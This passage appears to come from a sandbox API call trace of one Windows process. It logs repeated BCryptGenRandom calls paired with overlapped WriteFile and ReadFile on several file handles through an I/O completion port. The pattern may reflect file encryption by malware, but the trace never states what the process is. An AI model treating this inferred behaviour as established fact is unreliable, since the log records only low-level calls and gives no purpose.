lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0117.745] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0117.745] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0117.745] free (_Block=0x77d7a8) [0117.745] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0117.745] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0117.746] free (_Block=0x2071c20) [0117.746] free (_Block=0x2071d30) [0117.746] free (_Block=0x77d8b0) [0117.746] WriteFile (in: hFile=0x340, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0117.746] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0117.761] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.761] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.761] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0117.761] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.762] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.762] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0117.762] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0117.762] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0117.762] free (_Block=0x77d7a8) [0117.762] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0117.762] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0117.763] free (_Block=0x2071c20) [0117.763] free (_Block=0x2071d30) [0117.763] free (_Block=0x77d8b0) [0117.763] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0117.763] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0117.772] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.772] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0117.772] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.773] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0117.773] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0117.773] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0117.773] free (_Block=0x77d7a8) [0117.773] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0117.773] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0117.774] free (_Block=0x2071c20) [0117.774] free (_Block=0x2071d30) [0117.774] free (_Block=0x77d8b0) [0117.774] WriteFile (in: hFile=0x13c0, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0117.774] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0117.897] CloseHandle (hObject=0x340) returned 1 [0117.900] free (_Block=0x1ff1e60) [0117.900] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0117.907] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.908] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0117.908] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.909] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.909] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0117.909] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0117.909] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0117.909] free (_Block=0x77d7a8) [0117.909] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0117.909] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0117.910] free (_Block=0x2071c20) [0117.910] free (_Block=0x2071d30) [0117.910] free (_Block=0x77d8b0) [0117.910] WriteFile (in: hFile=0x2f4, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0117.910] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0117.958] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.958] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0117.958] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.959] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.959] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0117.959] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0117.959] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0117.959] free (_Block=0x77d7a8) [0117.959] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0117.959] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0117.960] free (_Block=0x2071c20) [0117.960] free (_Block=0x2071d30) [0117.960] free (_Block=0x77d8b0) [0117.960] WriteFile (in: hFile=0x3bc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0117.960] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0117.971] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.971] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0117.972] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.972] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0117.976] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0117.976] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0117.976] free (_Block=0x77d7a8) [0117.976] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0117.976] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0117.976] free (_Block=0x2071c20) [0117.976] free (_Block=0x2071d30) [0117.976] free (_Block=0x77d8b0) [0117.976] WriteFile (in: hFile=0x81c, lpBuffer=0x3db04f4*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0) returned 1 [0117.977] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0117.981] WriteFile (in: hFile=0x340, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3160, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0117.981] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0118.108] CloseHandle (hObject=0x81c) returned 1 [0118.109] free (_Block=0x3ef0008) [0118.109] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0118.116] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1bb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0118.116] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0118.131] ReadFile (in: hFile=0x3bc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xb20, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0118.131] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0118.143] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.143] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.143] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0118.143] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.144] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0118.144] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0118.144] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0118.144] free (_Block=0x77d7a8) [0118.144] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0118.144] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0118.145] free (_Block=0x2071c20) [0118.145] free (_Block=0x2071d30) [0118.145] free (_Block=0x77d8b0) [0118.145] WriteFile (in: hFile=0x81c, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0118.145] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0118.163] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.163] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.164] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0118.164] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.164] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.164] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0118.164] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0118.164] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0118.164] free (_Block=0x77d7a8) [0118.164] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0118.164] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0118.165] free (_Block=0x2071c20) [0118.165] free (_Block=0x2071d30) [0118.165] free (_Block=0x77d8b0) [0118.165] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.165] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0118.174] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.174] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.174] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0118.174] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.175] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.175] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0118.425] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0118.425] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0118.425] free (_Block=0x3e305b8) [0118.425] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0118.425] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0118.425] free (_Block=0x77d8b8) [0118.425] free (_Block=0x2071c20) [0118.425] free (_Block=0x77d7a8) [0118.425] WriteFile (in: hFile=0x13c0, lpBuffer=0x3db04f4*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0) returned 1 [0118.430] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0118.484] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.484] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0118.484] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.485] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.485] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0118.488] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0118.488] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0118.488] free (_Block=0x3e305b8) [0118.488] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0118.488] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0118.489] free (_Block=0x77d8b8) [0118.489] free (_Block=0x2071c20) [0118.489] free (_Block=0x77d7a8) [0118.489] WriteFile (in: hFile=0x308, lpBuffer=0x3df0564*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0530 | out: lpBuffer=0x3df0564*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0530) returned 1 [0118.489] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0118.490] WriteFile (in: hFile=0x308, lpBuffer=0x3df0564*, nNumberOfBytesToWrite=0x530, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0530 | out: lpBuffer=0x3df0564*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0530) returned 1 [0118.490] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0118.603] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1f00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.603] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0118.612] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x15b0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0118.622] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0118.633] ReadFile (in: hFile=0x3bc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x136a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0118.645] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0118.653] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xc10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.653] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0118.668] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x5b04, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0118.679] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0118.688] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.689] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.689] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0118.689] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.689] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.689] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0118.689] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0118.689] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0118.689] free (_Block=0x3e305b8) [0118.690] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0118.690] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0118.690] free (_Block=0x77d8b8) [0118.690] free (_Block=0x2071c20) [0118.690] free (_Block=0x77d7a8) [0118.690] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.690] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0118.701] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.701] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.701] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0118.701] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.702] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.702] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0118.702] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0118.702] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0118.702] free (_Block=0x3e305b8) [0118.702] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0118.702] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0118.702] free (_Block=0x77d8b8) [0118.702] free (_Block=0x2071c20) [0118.702] free (_Block=0x77d7a8) [0118.702] WriteFile (in: hFile=0x3bc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0118.703] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0118.722] CloseHandle (hObject=0x308) returned 1 [0118.724] free (_Block=0x3df0008) [0118.724] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0118.733] CloseHandle (hObject=0x13c0) returned 1 [0118.736] free (_Block=0x1ff1e60) [0118.736] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0118.753] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1c0a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0118.761] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0118.864] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.864] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0118.876] WriteFile (in: hFile=0x2f4, 